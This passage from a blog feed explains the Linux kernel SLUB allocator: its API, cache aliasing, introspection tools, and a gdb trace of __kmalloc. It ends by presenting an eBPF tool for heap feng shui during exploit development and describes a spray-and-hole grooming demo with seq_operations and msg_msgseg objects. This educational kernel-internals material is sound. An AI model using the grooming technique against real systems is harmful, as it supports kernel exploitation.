allocator as seen in modern Linux kernels by exploring the core data structures used in it&apos;s implementation and exploring how they fit together.</p><p>Next up we&apos;ll use this to take a look at the API and how the SLUB allocator can be used by other parts of the kernel. A bit later we&apos;ll also touch on some introspection, if you want to get some hands on and explore some of these data structures and stuff.</p><hr><ol><li><a href="https://lwn.net/Articles/881039/">https://lwn.net/Articles/881039/</a></li><li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23">https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23</a></li><li>Remember page order sizes from the previous section? A 0x1000 byte slab is an order 0 slab (2<sup>0</sup> pages).</li><li><a href="https://lwn.net/Articles/452884/">https://lwn.net/Articles/452884/</a></li><li><a href="https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html">https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html</a></li><li><a href="https://lwn.net/Articles/881039/">https://lwn.net/Articles/881039/</a></li><li>we&apos;ll remember from previous posts that there is a <code>struct page</code> for every physical page of memory that the kernel manages</li><li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74">https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74</a></li><li><a href="https://cateee.net/lkddb/web-lkddb/MEMCG.html">https://cateee.net/lkddb/web-lkddb/MEMCG.html</a></li><li><a href="https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt">https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt</a></li><li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433">https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433</a></li></ol><h3 id="the-api">The API</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/here_we_go-again.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="518" height="336"></figure><p>Thought you were done with kernel code? Hah! Think again. Time to take our understanding of the kernel&apos;s SLUB allocator and explore it&apos;s API.</p><p>Like all my posts, this is pretty adhoc, so if I get excited we might take a deeper look into some of the allocator functions and have a peek at the implementation.</p><p>It&apos;s worth highlighting again that <strong>there are three slab allocator implementations</strong> in the Linux kernel: <strong>SLAB</strong>, <strong>SLUB</strong> &amp; <strong>SLOB</strong>. They share the same API, so as to abstract the implementation from the rest of the kernel.</p><p>As you might expect, be prepared for plenty of <code>#ifdef</code>s when perusing the source! The starting point for which is probably going to be <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h">include/linux/slab.h</a></code>.</p><h4 id="kmalloc-kfree">kmalloc &amp; kfree</h4><figure class="kg-card kg-code-card"><pre><code class="language-c">void *kmalloc(size_t size, gfp_t flags)
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L586">/include/linux/slab.h</a></figcaption></figure><p>The bread and butter of the slab allocator API, <code>kmalloc()</code>, as the name implies, is essentially the kernel equivalent of C&apos;s <code>malloc()</code>. </p><p>It allows a kernel developer to request a memory allocation of <code>size</code> bytes, on a success the function will return a pointer to the allocated memory and error code<sup><a href="https://man7.org/linux/man-pages/man3/errno.3.html">[1]</a></sup> on a failure.</p><figure class="kg-card kg-code-card"><pre><code class="language-c">static __always_inline __alloc_size(1) void *kmalloc(size_t size, gfp_t flags)
{
	if (__builtin_constant_p(size)) {
		if (size &gt; KMALLOC_MAX_CACHE_SIZE)
			return kmalloc_large(size, flags);
	}
	return __kmalloc(size, flags);
}</code></pre><figcaption>&lt;todo&gt;</figcaption></figure><p>We can see the generic <code>kmalloc()</code> definition is a wrapper around <code>__kmalloc()</code> which is prototyped in <code>slab.h</code>, but the definition is slab implementation specific.</p><p>The <code>kmalloc()</code> wrapper essentially hands off large allocations (defined by <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L290">KMALLOC_MAX_CACHE_SIZE</a></code>) to a separate function: <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L526">kmalloc_large()</a></code> which in fact calls the underlying buddy allocator to serve large allocations!</p><p>Otherwise, <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L434">__kmalloc()</a></code> is called, who&apos;s implementation can be found in <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L4412">/mm/slub.c</a></code>.</p><figure class="kg-card kg-code-card"><pre><code class="language-c">void *__kmalloc(size_t size, gfp_t flags) { 
	struct kmem_cache *s;
	void *ret;
	...
	s = kmalloc_slab(size, flags);         [0]
	...
}</code></pre><figcaption>&lt;todo&gt;</figcaption></figure><p>Bringing things back round to the SLUB allocator, if this is making an allocation of <code>size</code> bytes - what <code>kmem_cache</code> is it allocating from? Good question!</p><p>By default the kernel creates an array of general purpose <code>kmem_caches</code> depending on the &quot;kmalloc type&quot; (derived from <code>flags</code>) and the allocation <code>size</code>.</p><p>These caches are mainly created via <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L875">create_kmalloc_caches()</a></code> and stored in the exported symbol <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339">kmalloc_caches</a></code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">extern struct kmem_cache *
kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1];</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339">/include/linux/slab.h</a></figcaption></figure><p>So to answer our question: <code>kmalloc()</code> will determine which <code>kmem_cache</code> to allocate from by using the <code>flags</code> and <code>sizes</code> arguments to index into <code>kmalloc_caches</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">	return kmalloc_caches[kmalloc_type(flags)][index];</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L737">/mm/slab_common.c</a></figcaption></figure><p>The <code>index</code> is above is derived from <code>size</code>. The general purpose cache size-to-index can be seen via the <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L386">__kmalloc_index()</a></code> definition. </p><p>This tells us the size of the objects in each <code>kmem_cache</code>, e.g. the <code>kmem_cache</code> for 256 byte objects will be at <code>index</code> 8. </p><p>Note that a <code>kmalloc()</code> allocation will use the smallest <code>kmem_cache</code> object size it can fit into. E.g. a 257 byte allocation won&apos;t fit into the 256 byte objects, so it will allocate from the next cache after, which is 512 byte objects.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/if_that-makes_sense.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><figure class="kg-card kg-code-card"><pre><code class="language-c">void kfree(const void *objp)</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L188">/include/linux/slab.h</a></figcaption></figure><p>Before you go throwing <code>kmalloc()</code>&apos;s left and right, don&apos;t forget <code>kfree()</code>! This is of course the ubiquitous function for freeing memory allocated via the slab allocator. </p><p>Calling this function on an object allocated via the slab allocator will free that object. If this slab was in the <code>full</code> list, it becomes <code>partial</code> and if this is the last object then the slab may get released altogether. </p><h4 id="kmemcachecreate">kmem_cache_create</h4><figure class="kg-card kg-code-card"><pre><code class="language-c">struct kmem_cache *kmem_cache_create(const char *name, unsigned int size,
			unsigned int align, slab_flags_t flags,
			void (*ctor)(void *));</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L150">/include/linux/slab.h</a></figcaption></figure><p>So we&apos;ve covered the fundamentals: allocating and freeing via the slab allocator. <code>kmem_cache_create()</code> allows kernel developers to create their own <code>kmem_cache</code> within the slab allocator - pretty neat, right?</p><p>Creating a special-purpose cache can be advantageous, especially for objects which are allocated often (like <code>struct task_struct</code>):</p><ul><li>We can reduce internal fragmentation by specifying the object size to suit our needs, as the general purpose caches have fixed object sizes which may not be optimal</li><li><code>ctor()</code> allows us to optimise initialisation of our objects if values are being reused </li><li>There&apos;s also debugging, security and other benefits to this but you get the gist!</li></ul><p>We can actually use Elixr to <a href="https://elixir.bootlin.com/linux/v6.0.6/A/ident/kmem_cache_create">see all the references</a> to <code>kmem_cache_create()</code> in the kernel to see who&apos;s making use of this too!</p><h4 id="kmemcachealloc">kmem_cache_alloc</h4><figure class="kg-card kg-code-card"><pre><code class="language-c">void *kmem_cache_alloc(struct kmem_cache *s, gfp_t flags) __assume_slab_alignment __malloc;</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L435">/include/linux/slab.h</a></figcaption></figure><p>Once we&apos;ve created a <code>kmem_cache</code>, we can use <code>kmem_cache_alloc()</code> to allocate an object directly from that cache. You&apos;ll notice here we don&apos;t supply a <code>size</code>, as caches have fixed sized objects and we&apos;re specifying directly the cache we want to allocate from! </p><h4 id="cache-aliases">cache aliases</h4><p>Something I haven&apos;t mentioned up until now, is the concept of SLUB aliasing. </p><p>To reduce fragmentation, the kernel may &quot;merge&quot; caches with similar properties (alignment, size, flags etc.). <code>find_mergeable()</code> implements this meragability check:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">struct kmem_cache *find_mergeable(unsigned size, unsigned align,
		slab_flags_t flags, const char *name, void (*ctor)(void *));</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L291">/include/linux/slab.h</a></figcaption></figure><p>A special-purpose cache may get merged/aliased with one of the general-purpose caches we touched on earlier, so allocations via <code>kmem_cache_alloc()</code> for a merged cache will actually come from the respective general-purpose cache.</p><hr><ol><li><a href="https://man7.org/linux/man-pages/man3/errno.3.html">https://man7.org/linux/man-pages/man3/errno.3.html</a></li></ol><h3 id="seeing-it-in-action">Seeing It In Action</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/roll_up_my_sleeves.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>This is where things get fun! In this section we&apos;re gonna take what we&apos;ve learned throughout this post and double check I haven&apos;t been making it all up :D </p><h4 id="procslabinfo">/proc/slabinfo</h4><p>Our good ol&apos; friend <code><a href="https://man7.org/linux/man-pages/man5/proc.5.html">procfs</a></code> is coming in strong again, by providing us <code><a href="https://man7.org/linux/man-pages/man5/slabinfo.5.html">/proc/slabinfo</a></code>, providing kernel slab allocator statistics to privileged users.</p><figure class="kg-card kg-code-card"><pre><code>$ sudo cat /proc/slabinfo
slabinfo - version: 2.1
# name            &lt;active_objs&gt; &lt;num_objs&gt; &lt;objsize&gt; &lt;objperslab&gt; &lt;pagesperslab&gt; : tunables &lt;limit&gt; &lt;batchcount&gt; &lt;sharedfactor&gt; : slabdata &lt;active_slabs&gt; &lt;num_slabs&gt; &lt;sharedavail&gt;
...
task_struct         1480   1539   8384    3    8 : tunables    0    0    0 : slabdata    513    513      0
...
dma-kmalloc-512        0      0    512   32    4 : tunables    0    0    0 : slabdata      0      0      0
...
kmalloc-cg-512      1169   1312    512   32    4 : tunables    0    0    0 : slabdata     41     41      0
...
kmalloc-512        40878  43360    512   32    4 : tunables    0    0    0 : slabdata   1355   1355      0
kmalloc-256        21850  21856    256   32    2 : tunables    0    0    0 : slabdata    683    683      0
kmalloc-192        35987  37002    192   21    1 : tunables    0    0    0 : slabdata   1762   1762      0
kmalloc-128         4555   5440    128   32    1 : tunables    0    0    0 : slabdata    170    170      0
</code></pre><figcaption>snippet from <code>$ sudo cat /proc/slabinfo</code></figcaption></figure><p>This provides some useful information on the various caches on the system. From the snippet above we can see some of the stuff we touched on in the API section!</p><p>We can see a private cache, used for <code>struct task_struct</code> named <code>task_struct</code>. Additionally we can see several general purposes caches, of various kmalloc types ( <code>KMALLOC_DMA</code>, <code>KMALLOC_CGROUP</code> and <code>KMALLOC_NORMAL</code> respectively) and sizes.</p><h4 id="slabtop">slabtop</h4><p><code><a href="https://man7.org/linux/man-pages/man1/slabtop.1.html">slabtop</a></code> is a neat little tool, and part of the /proc filesystem utilities project, which takes the introspection a step further by providing realtime slab cache information!</p><figure class="kg-card kg-code-card"><pre><code> Active / Total Objects (% used)    : 3479009 / 3524760 (98.7%)
 Active / Total Slabs (% used)      : 100682 / 100682 (100.0%)
 Active / Total Caches (% used)     : 130 / 181 (71.8%)
 Active / Total Size (% used)       : 923525.41K / 936501.10K (98.6%)
 Minimum / Average / Maximum Object : 0.01K / 0.27K / 295.07K

  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME                   
 766116 766116 100%    0.10K  19644       39     78576K buffer_head
...
 43328  40468  93%    0.50K   1354       32     21664K kmalloc-512
 36981  35834  96%    0.19K   1761       21      7044K kmalloc-192
</code></pre><figcaption>snippet from <code>$ sudo slabtop</code></figcaption></figure><h4 id="slabinfo">slabinfo</h4><p>Perhaps confusingly, there is also a tool named <code>slabinfo</code> which is provided with the kernel source in <code>tools/vm/slabinfo.c</code> (calling <code>make</code> in <code>tools/vm</code> is all you need to do build this and get stuck in).</p><p>To further the confusion, instead of <code>/proc/slabinfo</code>, <code>slabinfo</code> uses <code>/sys/kernel/slab/</code><sup><a href="https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab">[1]</a></sup> as it&apos;s source of information. It contains a snapshot of the internal state of the slab allocator which can be processed by <code>slabinfo</code>.</p><p>Further to our section on cache aliases earlier, we can use <code>slabinfo -a</code> to see a list of all the current cache aliases on our system!</p><pre><code>$ ./slabinfo -a
...
:0000256     &lt;- key_jar 
</code></pre><p>Here we can see the <code>kmem_cache</code> with name <code>&quot;key_jar&quot;</code> is aliased with <code>kmalloc-256</code>.</p><h4 id="debugging">debugging</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/headband_prepare.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Sometime&apos;s you just can&apos;t beat getting stuck into some good ol&apos; kernel debugging. I&apos;ve covered previously how to get this setup<sup><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">[2]</a></sup>, it&apos;s fairly quick to get kernel debugging via <code>gdb</code> up and running on a QEMU/VMWare guest I promise!</p><p>After that we can explore to our heart&apos;s content. We can unravel the exported list <code>slab_caches</code> directly, or perhaps break on a call to <code>kmalloc()</code> and see what hits first.</p><pre><code>gef&#x27A4;  b __kmalloc
Breakpoint 2 at 0xffffffff81347240: file mm/slub.c, line 4391.
...
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; trace &#x2500;&#x2500;&#x2500;&#x2500;
[#0] 0xffffffff81347240 &#x2192; __kmalloc(size=0x108, flags=0xdc0)
[#1] 0xffffffff81c4911c &#x2192; kmalloc(flags=0xdc0, size=0x108)
[#2] 0xffffffff81c4911c &#x2192; kzalloc(flags=0xcc0, size=0x108)
[#3] 0xffffffff81c4911c &#x2192; fib6_info_alloc(gfp_flags=0xcc0, with_fib6_nh=0x1)
[#4] 0xffffffff81c44186 &#x2192; ip6_route_info_create(cfg=0xffffc900007a7a58, gfp_flags=0xcc0, extack=0xffffc900007a7bb0)</code></pre><p>Given I&apos;m ssh&apos;d into my guest, probably unsurprising there&apos;s network stuff kicking about. Look like someone&apos;s requested a 0x108 byte object, and as we&apos;re going through <code>kmalloc()</code> this should end up in one of the general purpose caches. </p><p>0x108 is 264 bytes, so that&apos;s just too big for the <code>kmalloc-256</code> cache, so we should expect an allocation from on of the 512 byte general purpose caches, right? Let&apos;s find out!</p><pre><code class="language-C">void *__kmalloc(size_t size, gfp_t flags)
{
	struct kmem_cache *s;
	...
	s = kmalloc_slab(size, flags);
</code></pre><p>Looking at the source, we can see the call to <code>kmalloc_slab()</code> will return our cache.</p><pre><code>gef&#x27A4;  disas 
Dump of assembler code for function __kmalloc:
=&gt; 0xffffffff81347240 &lt;+0&gt;:     nop    DWORD PTR [rax+rax*1+0x0]
   0xffffffff81347245 &lt;+5&gt;:     push   rbp
   0xffffffff81347246 &lt;+6&gt;:     mov    rbp,rsp
   0xffffffff81347249 &lt;+9&gt;:     push   r15
   0xffffffff8134724b &lt;+11&gt;:    push   r14
   0xffffffff8134724d &lt;+13&gt;:    mov    r14d,esi
   0xffffffff81347250 &lt;+16&gt;:    push   r13
   0xffffffff81347252 &lt;+18&gt;:    push   r12
   0xffffffff81347254 &lt;+20&gt;:    push   rbx
   0xffffffff81347255 &lt;+21&gt;:    sub    rsp,0x18
   0xffffffff81347259 &lt;+25&gt;:    mov    QWORD PTR [rbp-0x40],rdi
   0xffffffff8134725d &lt;+29&gt;:    mov    rax,QWORD PTR gs:0x28
   0xffffffff81347266 &lt;+38&gt;:    mov    QWORD PTR [rbp-0x30],rax
   0xffffffff8134726a &lt;+42&gt;:    xor    eax,eax
   0xffffffff8134726c &lt;+44&gt;:    cmp    rdi,0x2000
   0xffffffff81347273 &lt;+51&gt;:    ja     0xffffffff813474d8 &lt;__kmalloc+664&gt;
   0xffffffff81347279 &lt;+57&gt;:    mov    rdi,QWORD PTR [rbp-0x40]
   0xffffffff8134727d &lt;+61&gt;:    call   0xffffffff812dbe70 &lt;kmalloc_slab&gt;
   0xffffffff81347282 &lt;+66&gt;:    mov    r12,rax
   ...</code></pre><p>Okay, nice, we can see the call to <code>kmalloc_slab()</code> on line 20, so we just need to check the return value after that <code>call</code> :) Cos we&apos;re on <code>x86_64</code> we know it&apos;ll be in <code>$RAX</code>.</p><pre><code>&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; registers &#x2500;&#x2500;&#x2500;&#x2500;
$rax   : 0xffff888100041a00  &#x2192;  0x0000000000035140  &#x2192;  0x0000000000035140
...
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; code:x86:64 &#x2500;&#x2500;&#x2500;&#x2500;
   0xffffffff81347273 &lt;__kmalloc+51&gt;   ja     0xffffffff813474d8 &lt;__kmalloc+664&gt;
   0xffffffff81347279 &lt;__kmalloc+57&gt;   mov    rdi, QWORD PTR [rbp-0x40]
   0xffffffff8134727d &lt;__kmalloc+61&gt;   call   0xffffffff812dbe70 &lt;kmalloc_slab&gt;
 &#x2192; 0xffffffff81347282 &lt;__kmalloc+66&gt;   mov    r12, rax
...
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; trace &#x2500;&#x2500;&#x2500;&#x2500;
[#0] 0xffffffff81347282 &#x2192; __kmalloc(size=0x108, flags=0xdc0)
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;
gef&#x27A4;  p *(struct kmem_cache*)$rax
$6 = {
  ...
  size = 0x200,
  object_size = 0x200,
  ...
  ctor = 0x0 &lt;fixed_percpu_data&gt;,
  inuse = 0x200,
  ...
  name = 0xffffffff8297cb4c &quot;kmalloc-512&quot;,</code></pre><p>And voila! We cast the value returned by <code>kmalloc_slab()</code> as a <code>kmem_cache</code> and just like that we can view the members. We can see the name is indeed <code>kmalloc-512</code> as we hypothesised and we can also see some of the other fields we touched on :) </p><p>Anyway, hopefully that was a fun little demo on how you can reinforce your understanding with a little exploration in the debugger.</p><p>I also wanted to highlight <code><a href="https://github.com/osandov/drgn">drgn</a></code> as another debugger to tinker with, which lets you do live introspection &amp; debugging on your kernel. It&apos;s written in python and is very programmable, however I couldn&apos;t get it to find some symbols for this particular demo.</p><h4 id="slxbtrace-ebpf">slxbtrace (ebpf)</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/exited_dance.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Now for the grand reveal, the real reason behind this 5,000 word (yikes) post ... a cool little tool I&apos;ve been working on for visualising slub allocations :D </p><p>Well, this could very well already be a thing, but I&apos;d been sleeping on ebpf for far too long and this seemed like a fun way to explore the tooling.</p><p>Without going too much into the ebpf implementation (another post, maybe?!), <code>slxbtrace</code><sup>[3]</sup> lets you specify a specific cache size and visualise the cache state. In particular you can highlight allocations from particular call sites, making it a neat tool for helping with heap feng shui during exploit development.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2022/11/slxbtrace_demo.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="2558" height="1344"><figcaption>pls excuse the flickering... my fault for using linux</figcaption></figure><p>Let me explain what on earth is going on here. So, <code>slxbtrace</code> will basically hook and process calls to <code>kmalloc()</code> and <code>kfree()</code> and show you what&apos;s where in a cache.</p><p>So far it&apos;s pretty naive, when you run it, it has no knowledge of the cache state. However, once it starts catching <code>kmalloc()</code>&apos;s it can build up an idea of where the slabs are (as they&apos;re page aligned) and the objects in it.</p><p>Each known slab is visualised. We can see the slab address on the left, and then the objects in the slab as they&apos;d sit in memory:</p><ul><li><code>?</code> means <code>slxbtrace</code> doesn&apos;t know the state of this object</li><li><code>-</code> represents a free object</li><li><code>x</code> represents a misc allocations</li><li><code>0...</code> we can then tag specific allocations so they&apos;re easy to visualise</li></ul><p>So what&apos;s going on in this demo?! Well I am tracking the state of the <code>kmalloc-cg-32</code> cache with <code>slxbtrace</code> on the left, while I run a program will triggers a bunch of kmallocations on the right (<code>kmalloc32-fengshui</code>). This program:</p><ol><li>Triggers 800 allocations of <code>struct seq_operations</code>, whose allocations are tracked as <code>|0|</code>, to fill up some slabs!</li><li>Free&apos;s every other <code>struct seq_operations</code> after the first 400, effectively trying to make some holes (denoted by <code>|-|</code>) in the slabs we just filled up</li><li>Next I allocate a bunch of <code>struct msg_msgseg</code>s of the same size (denoted by <code>|1|</code>), trying to land them next to my <code>struct seq_operations</code> in memeory :D </li><li>Finally I cleanup everything and free it all :) </li></ol><p>Right now this is just a very, very barebones poc and likely has some issues, but I thought it would be neat to share here as it demonstrates some of the stuff we&apos;ve touched on.</p><p>I will absolutely share all this on my github though, once it&apos;s in a shareable state, just in case anyone else is also interesting in playing around!</p><hr><ol><li><a href="https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab">https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab</a></li><li><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging">https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging</a></li><li>not the final name, probably</li></ol><h3 id="wrapping-up">Wrapping Up</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/we_survived.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Is this... did we... is it over? This one really turned into an absolute leviathan, but perhaps that&apos;s just a testament to work that behind the kernel&apos;s slab allocator!</p><p>In this post we covered an integral part to the kernels memory management subsystem: the slab allocator. Specifically, we looked at the SLUB implementation which is the de factor implementation on modern systems (bar embedded stuff). </p><p>We really lived up to the Linux internals namesake in this post, as we dived in and explored the SLUB allocator from all angles: the underpinning data structures, the API used by the rest of the kernel and then validated this all with some introspection.</p><p>Hopefully this provided a reasonably holistic insight into slab allocators, with opportunities for further reading/exploration readily available. </p><p>Also worth noting we kept things pretty shiny as we looked primarily at the latest (at the time of starting) kernel release, v6.0.6!</p><p>I was going to expand a bit on SLAB and SLOB, but to be honest we&apos;re almost at 6000 words and it&apos;s probably out of scope for my aims for this series, but just in case:</p><ul><li>SLAB (non-default since 14 years) was the prev default implementation and the tl;dr is it was more complex than SLUB and less friendly to modern multi-core systems <sup><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">[1]</a></sup></li><li>SLOB was introduced ~2005 and aimed at embedded devices, trying to think things compact as possible to make the most of less memory <sup><a href="https://lwn.net/Articles/157944/">[2]</a></sup></li></ul><hr><ol><li><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">https://www.kernel.org/doc/gorman/html/understand/understand011.html</a></li><li><a href="https://lwn.net/Articles/157944/">https://lwn.net/Articles/157944/</a></li></ol><h2 id="next-time">Next Time!</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/still_here.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Well, to be honest, as far as &quot;<strong>Memory Allocators&quot;</strong> goes as a topic, we&apos;ve done pretty well between our coverage on the buddy and slab allocators.</p><p>I&apos;m not entirely sure there will be a next time for this mini series, I might hop back onto the virtual memory stuff and look into the lower level implementation there.</p><p>That said, if I were to explore the memory allocator space more I&apos;d want to cover the security side of things: memory allocators in the context of exploit techniques and mitigations. If that&apos;s something you&apos;d be into, feel free to let me know :)</p><p>Otherwise: thanks for reading, and as always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[So You Wanna Pwn The Kernel?]]></title><description><![CDATA[My aim for this post is to provide some insights for getting into Linux kernel vulnerability research and exploit development]]></description><link>https://sam4k.com/so-you-wanna-pwn-the-kernel/</link><guid isPermaLink="false">6308337592020209c38fb0fa</guid><category><![CDATA[VRED]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Thu, 01 Sep 2022 